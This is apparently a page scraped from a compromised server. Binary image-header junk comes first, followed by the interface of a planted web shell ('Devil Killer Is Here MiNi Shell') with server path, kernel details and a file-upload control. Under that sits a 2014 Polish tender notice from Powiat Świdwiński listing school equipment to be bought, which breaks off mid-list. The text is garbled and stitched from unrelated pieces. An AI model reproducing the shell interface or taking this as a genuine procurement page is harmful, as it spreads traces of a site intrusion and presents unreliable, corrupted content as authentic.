JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140827/284728-N-2014.html

<p class="kh_header"><b>Świdwin: Doposażenie bazy dydaktycznej szkół ponadgimnazjalnych Powiatu Świdwińskiego w ramach projektu pt.: Najlepszy w zawodzie Program Operacyjny Kapitał Ludzki
Priorytet IX:  Rozwój wykształcenia i kompetencji w regionach Działanie: 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego</b><br>
<b>Numer ogłoszenia: 284728 - 2014; data zamieszczenia: 27.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie bazy dydaktycznej szkół ponadgimnazjalnych Powiatu Świdwińskiego w ramach projektu pt.: Najlepszy w zawodzie Program Operacyjny Kapitał Ludzki
Priorytet IX:  Rozwój wykształcenia i kompetencji w regionach Działanie: 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostarczenie komputerów, sprzętu audiowizualnego, sprzętu sprzątającego, mebli, sprzętu gastronomicznego oraz maszyn rolniczych.
Część I - Zakup oraz dostarczenie sprzętu komputerowego
1.Listwa zasilająca przeciwprzepięciowa
 min. 5 gniazd 	6	szt.
2.Tester płyty głównej komputera
Umożliwiający odczytanie komunikatów POST	6	szt.
3.Płyta główna komputera 
Wyposażona w magistrale min:
1 x PCIe 3.0-2.0 x16 (x16 mode, blue)
1 x PCIe 2.0 x16 (black)
2 x PCIe 2.0 x1
2 x PCI
2 x SATA 6Gb/s port(s), gray
4 x SATA 3Gb/s port(s), blue
Posiadająca  włącznik komputera, który  jest podłączony do płyty głównej. Dzięki temu włączanie i wyłączanie zasilacza może być kontrolowane przez komponenty komputera lub oprogramowanie. Oparte na  układach scalonych o bardzo wysokiej skali integracji. W konstrukcji płyt głównych odpowiadają za zapewnienie współpracy poszczególnych elementów składających się na system komputerowy.	6	szt.
4.	Zasilacz 
moc min. 500W 
Kompatybilny z płytą główną
12	szt.
5.Napęd DVD z nagrywarką 
SATA	6	szt.
6.Pamięć min. 4GB
DDR3 kompatybilna z płyta główną	12	szt.
7.Dysk twardy min.500 MB
SATA	6	szt.
8.Karta sieciowa przewodowa
Min. 100M/1G PCI-Expres	6	szt.
9.Karta sieciowa bezprzewodowa
PCI-Expres	6	szt.
10.Karta graficzna
PCI-Expres	12	szt.
11.Pamięć USB min.4 GB
min. USB26	szt.
12.Kieszeń USB do dysku twardego
Kompatybilna z dyskiem twardym 	6	szt.
13.Komplet do transmisji  Blue Tooth
Dowolny USB	6	szt.
14.	Zestaw komputerowy (monitor + stacja)	17	szt.
Typ 	Komputer stacjonarny. W ofercie wymagane jest podanie modelu, symbolu oraz producenta.	
Zastosowanie	Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji edukacyjnych, aplikacji obliczeniowych, dostępu do Internetu oraz poczty elektronicznej	
Wydajność obliczeniowa	Procesor wielordzeniowy ze zintegrowaną grafiką, osiągający w teście PassMark CPU Mark wynik min. 3829 punktów	
Pamięć operacyjna	min.8 GB DDR3 1600MHz non-ECC możliwość rozbudowy do min. 32GB.	
Wydajność grafiki	Karta dedykowana  z własną pamięcią min. 1024 MB (pamięć własna).
Oferowana karta graficzna musi osiągać w teście PassMark Performance Test co najmniej wynik  min. 456 punktów w G3D Rating	
Parametry pamięci masowej	Dysk min. 500GB SATA III 7200 obr.min.	
Wyposażenie multimedialne	min. 24-bitowa karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, wewnętrzny głośnik w obudowie komputera, porty słuchawek i mikrofonu na przednim oraz na tylnym panelu obudowy. 	
Karta sieciowa	10-100-1000 Mbps, Wi-Fi 802.11 b-g-n	
Obudowa	Typu MiniTower z obsługą kart PCI Express wyłącznie o pełnym profilu, wyposażona w min. 4 kieszenie: 2 szt. 5,25 zewnętrzne pełnych wymiarów  i 2 szt. 3,5 wewnętrzne,
Suma wymiarów obudowy nie może przekraczać 97cm i objętości 27 litrów, waga max 10 kg,
Zasilacz o mocy max. 350W pracujący w sieci 230V 
Złącza na przednim panelu:
- 1 x czytnik kart pamięci 2 w 1 (CF MD)
- 1 x czytnik kart pamięci 2 w 1 (MS Duo MS Pro)
- 1 x czytnik kart pamięci 2 w 1 (SMxD)
- 1 x czytnik kart pamięci 4 w 1 (SD SDH CS DXC MMC)
- 2 x USB 2.0
- 2 x USB 3.0
- 1 x wyjście słuchawkowe/ głośnikowe
Złącza na tylnym panelu:
- 1 x Bluetooth 4.0 Hs
- 1 X DVI (karta graficzna)
- 1x HDMI
- 1x HDMI (karta graficzna)
- 1x RJ45 (LAN)
- 6x liniowe wyjścia AUDIO (możliwość podłączenia zestawu 7.1)
- 1x VGA (D-sub)
- 4x USB 2.0 
- 2x USB 3.0	
Systemami operacyjny 	Zainstalowany system operacyjny typu Microsoft Windows 7 Home Premium PL (wersja 64-bitowa)  lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz obsługujący wszystkie urządzenia obsługiwane przez ww. system oraz  MS Office 2010 lub równoważny tj.  pakiet biurowy zawierający wszystkie elementy Microsoft Office  2010, w pełni obsługujący wszystkie istniejące dokumenty bez utraty jakichkolwiek ich parametrów i cech użytkowych.
Dołączone oprogramowanie na  osobnym nośniku z systemem oraz sterowniki do systemu.	
Monitor wyświetlacz	Ekran z aktywną matrycą IPS 21.5, o jasności min. 250 cdm2, kontrast min.800:1, kąt widzenia min. (pionpoziom): 160-170 stopni, czas reakcji matrycy - min. 5 ms, rozdzielczość min. 1280 x 1024 przy częstotliwości max.60 Hz, obsługa kolorów: min. 16,7 mln . Powłoka wyświetlacza  antyodblaskowa 3H. Podstawka-możliwość przechylania, obracania i regulacji wysokości; Pobór energii typowo:  26 W (max. 42W, czuwanie min 0,3 W).	
Ergonomia	Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 25 dB (dokument w postaci oświadczenia producenta należy dołączyć przed podpisaniem umowy).	
Warunki gwarancji	3 lata gwarancji producenta 
Czas reakcji serwisu - do końca następnego dnia roboczego od dnia zgłoszenia awarii.
Podmiot realizujący serwis musi posiadać certyfikat systemu zarządzania jakością wg normy ISO serii 9001 na świadczenie usług serwisowych lub równoważny w zakresie świadczenia serwisu oraz posiadać autoryzację producenta komputera. Serwis urządzeń musi być realizowany przez Autoryzowanego Partnera Serwisowego lub Producenta. W przypadku awarii dysków twardych dysk pozostaje u Zamawiającego.	
Warunki techniczne	Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera.	
Wymagania dodatkowe	Kabel zasilający w zestawie
Klawiatura USB przewodowa 
Mysz USB przewodowa  	
15.	Komputer - laptop 
1	szt.
Typ	Komputer przenośny typu notebook z ekranem max. 15,6 o rozdzielczości: HD (1366x768) w technologii LED przeciwodblaskowy. W ofercie wymagane jest podanie modelu, symbolu oraz producenta.	
Zastosowanie	Komputer przenośny będzie wykorzystywany dla potrzeb aplikacji biurowych, dostępu do sieci intranet oraz poczty elektronicznej	
Procesor	Procesor min. 2 rdzeniowy (1.6 GHz do 2.6 GHz, 3 MB cache), zaprojektowany do pracy w komputerach przenośnych, Zaoferowany procesor musi uzyskiwać w teście Passmark CPU Mark wynik min.: 3268 punktów 	
Pamięć operacyjna	max. 8GB (SO-DIMM DDR3 1600MHz) 	
Parametry pamięci masowej	Dysk twardy max. 750 GB Sata	
Karta graficzna	Karta graficzna dedykowana do laptopa DDR3, obsługa  DirectX 11.1, magistrala 64 bit, pamięć min. 1024 MB,
pamięć własna karty graficznej max. 2048 MB GDDR3	
Wyposażenie multimedialne	Min 24-bitowa Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, wbudowane głośniki stereo.	
Obudowa	Obudowa notebooka metalowa-wzmocniona, wykonana ze szczotkowanego aluminium, szkielet i zawiasy notebooka wykonany z wzmacnianego metalu, dookoła matrycy gumowe uszczelnienie chroniące klawiaturę notebooka po zamknięciu przed kurzem i wilgocią. Kąt otwarcia notebooka min. 180 stopni. W  obudowie  notebooka  zintegrowany  mechaniczny  przesuwny  zamek  uniemożliwiający samoczynne otwarcie się notebooka	
Wymagania dotyczące baterii	min. 6-cell, 60WHr, Li-Ion Czas pracy na baterii min. 4 godzin. Zasilacz o mocy min. 65W	
Zgodność z systemami operacyjnymi i standardami	Zgodność z 32-bitową i 64-bitową wersją systemu operacyjnego Microsoft Windows 7 Home Premium PL lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz obsługujący wszystkie urządzenia obsługiwane przez ww. system.	
System operacyjny	Zainstalowany system operacyjny typu Microsoft Windows 7 Home Premium PL (wersja 64-bitowa)  lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz  obsługujący wszystkie urządzenia obsługiwane przez ww. system. 
Dołączone oprogramowanie na  osobnym nośniku z systemem oraz sterowniki do systemu.	
Ergonomia	Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 25 dB (dokument w postaci oświadczenia producenta należy dołączyć przed podpisaniem umowy).	
Waga	Waga max 2.4 kg z baterią 4-cell	
Wsparcie techniczne producenta	Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera.	
Wymagania dodatkowe	Nagrywarka DVD+ - RW DualLayer, Wi-Fi , Bluetooth
HDMI - 1 szt. , czytnik kart pamięci - 1 szt.  
Dołączony nośnik ze sterownikami.	
Warunki gwarancji	3-letnia gwarancja producenta świadczona na miejscu u klienta.
Czas reakcji serwisu - do końca następnego dnia roboczego.
Firma serwisująca musi posiadać ISO 9001:2000 na świadczenie usług serwisowych oraz posiadać autoryzacje producenta komputera.
Serwis urządzeń musi być realizowany przez Producenta lub Autoryzowanego Partnera Serwisowego Producenta.
W przypadku awarii dysk twardy pozostaje u Zamawiającego.	
Interfejsy	złącza zewnętrzne USB 3.0 - 2 sztuki
złącza zewnętrzne USB 2.0 - 2 sztuki	
Inne	Pełen komplet kabli potrzebnych do pełno funkcjonalnej pracy urządzenia.	
16.	Komputery stacjonarne
3	szt.
Typ 	Komputer stacjonarny. W ofercie wymagane jest podanie modelu, symbolu oraz producenta.	
Zastosowanie	Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji edukacyjnych, aplikacji obliczeniowych, dostępu do Internetu oraz poczty elektronicznej	
Wydajność obliczeniowa	Procesor wielordzeniowy ze zintegrowaną grafiką, DDR3-1333-1600, 64 bity, (3.2-3.6 GHz, 6 MB cache)	
Pamięć operacyjna	min.8GB DIMM DDR3 1600 MHz,	
Wydajność grafiki	Karta dedykowana  z własną pamięcią min. 1024 MB (pamięć własna).
Magistrala 64-128 bit, obsługa  DirectX 11	
Parametry pamięci masowej	Dysk twardy max. 1TB magnetyczny 7200 obr.min,	
Wyposażenie multimedialne	min. 24-bitowa karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, wewnętrzny głośnik w obudowie komputera, porty słuchawek i mikrofonu na przednim oraz na tylnym panelu obudowy. 	
Karta sieciowa	10-100-1000 Mbps, Wi-Fi 802.11 b-g-n	
Obudowa	MiniTower z obsługą kart PCI Express wyłącznie o pełnym profilu, wyposażona w min. 4 kieszenie: 2 szt. 5,25 zewnętrzne pełnych wymiarów  i 2 szt. 3,5 wewnętrzne,
Suma wymiarów obudowy nie może przekraczać 97cm i objętości 27 litrów, waga max 10 kg,
Zasilacz o mocy max. 350W pracujący w sieci 230V 
Złącza na przednim panelu:
- 1 x czytnik kart pamięci 2 w 1 (CF-MD)
- 1 x czytnik kart pamięci 2 w 1 (MS Duo MS Pro)
- 1 x czytnik kart pamięci 2 w 1 (SM xD)
- 1 x czytnik kart pamięci 4 w 1 (SD SDHC SDXC MMC)
- 2 x USB 2.0
- 2 x USB 3.0
- 1 x wyjście słuchawkowe głośnikowe
Złącza na tylnym panelu:
- 1 x Bluetooth 4.0 Hs
- 1 X DVI (karta graficzna)
- 1x HDMI
- 1x HDMI (karta graficzna)
- 1x RJ45 (LAN)
- 6x liniowe wyjścia AUDIO (możliwość podłączenia zestawu 7.1)
- 1x VGA (D-sub)
- 4x USB 2.0 
- 2x USB 3.0	
Systemami operacyjny 	Zainstalowany system operacyjny typu Microsoft Windsws 7 Home Premium PL (wersja 64 bitowa) lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz obsługujący wszystkie urządzenia obsługiwane przez ww. system oraz MS Office 2010 lub równoważny tj.  pakiet biurowy zawierający wszystkie elementy Microsoft Office  2010, w pełni obsługujący wszystkie istniejące dokumenty bez utraty jakichkolwiek ich parametrów i cech użytkowych.
Dołączone oprogramowanie na  osobnym nośniku z systemem oraz sterowniki do systemu.	
Ergonomia	Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 25 dB (dokument w postaci oświadczenia producenta należy dołączyć przed podpisaniem umowy).	
Warunki gwarancji	3 lata gwarancji producenta 
Czas reakcji serwisu - do końca następnego dnia roboczego od dnia zgłoszenia awarii.
Podmiot realizujący serwis musi posiadać certyfikat systemu zarządzania jakością wg normy ISO serii 9001 na świadczenie usług serwisowych lub równoważny w zakresie świadczenia serwisu oraz posiadać autoryzację producenta komputera. Serwis urządzeń musi być realizowany przez Autoryzowanego Partnera Serwisowego lub Producenta. W przypadku awarii dysków twardych dysk pozostaje u Zamawiającego.	
Warunki techniczne	Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera		
17.	Drukarka laserowa (czarno-biała)	Nominalna prędkość druku min.: 30str-min., rozdzielczość min.1200x1200. Gramatura papieru 60-220 g-m2, pojemność pojemnika papieru min. 250 szt.  Zainstalowana pamięć min. 32 MB, maksymalny rozmiar nośnika A4, złącza zewnętrze min. USB 2.0, druk dwustronny- automatyczny.
Pełen komplet kabli potrzebnych do pełno funkcjonalnej pracy urządzenia.
Gwarancja 2 lat	1 	szt.
18.	Pendrivy	min. 8 GB	165	szt.
19.	Kasa fiskalna	1	szt.
Zastosowanie
Urządzenie elektroniczne, służące do rejestracji obrotu oraz kwot podatku należnego ze sprzedaży detalicznej.	
Liczba PLU	max. 3000 	
Szerokość papieru	min. 57 mm	
Złącza 	USB	
Zasila
Zasilanie awaryjne	akumulator min. 6V, 3Ah	
Wymiary i waga	max. 194x105x215 mm  max. 1,5 kg 	
Mechanizm drukujący	Termiczny,  posiadający mechanizm wrzutowy szybkiego załadunku papieru	
Wyświetlacz operatora/klienta	LCD 2 x 16 znaków, podświetlany, niebieski	
Współpraca z innymi urządzeniami	komputer, szuflada, skaner, waga	
Liczba stawek PTU	max. 7	
Długość nazw oraz liczba grup towarowych	max. 18 znaków/ max. 42	
Inne	Opcja: rabaty - kwotowe, procentowe na pozycje, na paragon
Dodatkowe kody kreskowe	
Warunki gwarancji 	2 lata	
Część II -  Zakup oraz dostarczenie sprzętu audiowizualnego
1	Tablica interaktywna  
Powierzchnia robocza min. 1660x1190. Powierzchnia tablicy odporna na uszkodzenia, porysowania. Prędkość odczytu położenia pisaka min. 150 współrzędnych na sekundę.  Możliwość podłączenia do komputera za pomocą portu USB lub portu RS 232. Zgodność z systemami operacyjnymi: Windows XP, Vista, 7 (32 i 64 Bit), Linux i Mac Os lub równoważnymi tj. obsługującymi wszystkie programy obsługiwane przez  ww. systemy, wykonujące wszystkie funkcjonalności systemu oraz obsługujące wszystkie urządzenia obsługiwane przez ww. systemy - wymagane polskie wersje językowe i pliki pomocy dla każdego z wymienionych systemów. Możliwość jednoczesnego pisania dwoma pisakami w dowolnym miejscu tablicy. Pasek skrótów tylko po jednej stronie tablicy:  Waga tablic max: 17 kg
Gwarancja tablicy: 3 lat, 	1	szt.
2	Rzutnik ultra szerokokątny
Wejścia VGA 2 x VGA Wyjścia VGA 1 x VGA Wejścia Video 1 x S-Video, 1 x Composite Wejścia Audio 3 x Mini Jack Stereo, 1 x RCA Stereo Wyjścia Audio 1 x Mini Jack Stereo Porty sterujące RJ45, RS232,  wejścia USB 2 x USB typu A (wizualizer, PenDrive), 1 x USB typu B (funkcja myszy). Rozdzielczość min.1024 x 768 pikseli. Jasność max. 3000/2080 ANSI lm (STDECO) . Kontrast min.2000:1 . Żywotność lampy min.2500/3500 godzin (STDECO) . Współczynnik powiększenia min. x1,35 (cyfrowy) . Poziom hałasu min.28/35 dB (STDECO) 
Urządzenie powinno wyświetlać obraz zarówno w tradycyjnym, jak i panoramicznym formacie z bardzo bliskiej odległości od ekranu. Rzutnik winien posiadać lampy oferujące ostrzejszy, bardziej naturalny obraz, lepsze odzwierciedlenie szczegółów oraz bardziej nasycone kolory, bez rozwarstwień.
Gwarancja na lampę 2 lata lub 3000 godzin, 
Gwarancja 3 lata na urządzenie
1	szt.
3Wizualizer
Zum optyczny min. 12, cyfrowy min. 10, fokus: automatyczny, obszar rejestrowania A3.
rozdzielczość wyjściowa: SXGA(1280X1024)/XGA(1024X768)/WXGA 16:10(1280X800) WXGA 16:9(1360X768)/1080p (1920X1080) .Regulacja parametrów obrazu: automatyczne naświetlenie, czarno-biały, regulacja jasności, kolor, regulacja kontrastu, redukcja migotania, obracanie obrazów, tryb mikroskopu, negatywy, tryby koloru: tekst/standardowy/ekran, balans bieli (automatyczny/światło fluorescencyjne/światło żarowe/światło dzienne). Przyłącza: złącze USB 2.0 typu A i B, wejście VGA, wyjście VGA i HDMI, wbudowany mikrofon, gniazdo kart pamięci SD: obsługa myszy USB. Pióro, gumka, kształty, kolor, grubość. Przechowywanie obrazów: GB pamięci wewnętrznej. Zgodność z SD/SDHC (128 MB-32 GB), Zgodność z urządzeniem pamięci USB (128 MB-64 GB). 
Funkcje:  automatyczne wykrywanie współczynnika proporcji obrazu, automatyczne ustawianie ostrości, automatyczne ustawienie rozdzielczości wyjściowej, zatrzymanie obrazu, pokaz slajdów, dzielenie ekranu, nagrywanie filmów i odtwarzanie
Gwarancja 2 lata	1	szt.
Część III - Zakup oraz dostarczenie mebli
1.Meble do recepcji
Witryna narożna szklana, wysokość od 160 cm do 200 cm, szerokość min. 600 mm, głębokość min. 400 mm, półki min. 4 szt. szklane, oszklony przód, kolor buk lub zbliżony.	1 	szt.
2.Stół montażowy
Stoły mają powierzchnię blatów drewnianą lub z materiałów drewnopochodnych (płyty wiórowe, sklejka itp.)Wymiar blatu min. 120x60 cm min. dwie szuflady wysuwane.	6 szt.
3.Szafka narzędziowa
min. 4 szuflady, metalowa z kółkami jezdnymi	6 	szt.
Część IV - Zakup oraz dostarczenie sprzętu sprzątającego
1.Wózek hotelowy
wózek hotelowy z roletą do przewozu czystej i brudnej bielizny. Max. 2 wysokie półki, max. 3 kuwety wewnętrzne, max.1 worek 100-litrowy na brudną bieliznę, duże koła w tym 2 skrętne, gumowana bieżnia kół, roleta zakrywająca, kuwety wewnętrzne, rolki odbojowe, max. 2 półki, 3 kuwety wewnętrzne. Wymiary min. : 1100x580x1480mm	1szt.
2.Automat szorująco - zbierający
Wydajność ok. min. 1000 m2h
Szerokość robocza min. 40 cm 
Zasilanie bateryjne
Gwarancja min 2 lata
Spełniająca wymagania HACCP		
Cześć V - Zakup oraz dostarczenie prasy rolującej - używanej
1	Prasa rolująca - używana
Rodzaj prasy: stałokomorowa,
Stan techniczny: używana, sprawna;
Średnica bel:  do 1500 mm;
Szerokość bel: 1200- 1300 mm;
Obwiązywacz bel : sznurek lub siatka;
Zapotrzebowanie mocy: 50- 90 kM;
Wyposażenie: wał przegubowo- teleskopowy; blokada komory: hydrauliczna lub mechaniczna	1	szt.
Część VI - Zakup oraz dostarczenie sprzętu gastronomicznego
1Zamrażarka szufladowa
Wyposażona w redukującą oszronienie wewnątrz komór urządzenia, obsługująca graficzny wskaźnik temperatury. 
Głośność max. 38 dB.
Pojemność netto max. 350-360 l,
Ilość szuflad max. 6-7,
zdolność zamrażania max. 24kg24h , 
zdolność utrzymania temperatury bez zasilania min. 30-35 godz.
Alarm wzrostu temperatury
klasa energetyczna max. A+++ 
Gwarancja min 2 lata	1		szt.
2	Kuchenka  indukcyjna jednopalnikowa
moc: min. 3,5 kW,
napięcie: max. 230 V, 
odpowiednia do garnków i patelni o średnicy od 120 do 260 mm, 
cyfrowa regulacja mocy, temperatury i czasu, ochrona przed przegrzaniem,  automatyczne włączanie i dostosowanie powierzchni grzewczej do podstawy garnka lub patelni, obudowa wykonana ze stali nierdzewnej
Gwarancja min 2 lata	2	szt.
3	Grill węglowy 
Wymiary paleniska max. 100 x 56cm, dwa duże niezależnie regulowane ruszty,  wykonane ze stali chromowanej, palenisko wykonane ze stali emaliowanej z dodatkiem keramzytu, drewniane półki, kółka, uchwyt do przewożenia
Wymiary minimalne:
- wysokość: 91 cm
- szerokość: 65 cm
- długość: 132 cm	1		szt.
4	Miesiarka planetarna
Zasilanie min. 230v50hz
Pojemność min. 5l
Mikro wyłącznik bezpieczeństwa Osłona bezpieczeństwa.
Spełniająca wymagania HACCP
Gwarancja min 2 lata	1		szt.
5Kuchnia elektryczna z piekarnikiem 5 palnikowa
Szybkogrzejne płyty grzewcze o mocy  min.2kW z zabezpieczeniem przeciw przegrzaniu
Górna płyta wytłaczana
Piekarnik elektryczny min. 3kW o pij min. 3xGN1 1
Spełniająca wymagania HACCP
Gwarancja min 2 lata	1		szt.
6Maszynka do pierogów
Wałkowanie ciasta na grubość ok. 1,5mm na pierogi 
Wykonana ze stali nierdzewnej 
Spełniająca wymagania HACCP
Gwarancja min 2 lata	1		szt.
7	Mikser ręczny o poj. max.15 l
Do obróbki w średnich naczyniach o poj. do 15l
Obudowa w całości wykonana z metalu
Możliwość demontażu dzwona.
Prędkość obrotowa trzepaczki min. 350-1560 obr min
Spełniająca wymagania HACCP
Gwarancja min 2 lata	1		szt.
8	Stoły cateringowe
Wykonany  polietylenu. Do użytku wewnętrznego i zewnętrznego. Łatwe przechowywanie i transport. wymiary po rozłożeniu max.1830 × 762 × 740 mm, 
wymiary po złożeniu: min. 915 × 762 × 45 mm	2		szt.
9	Ławki cateringowe
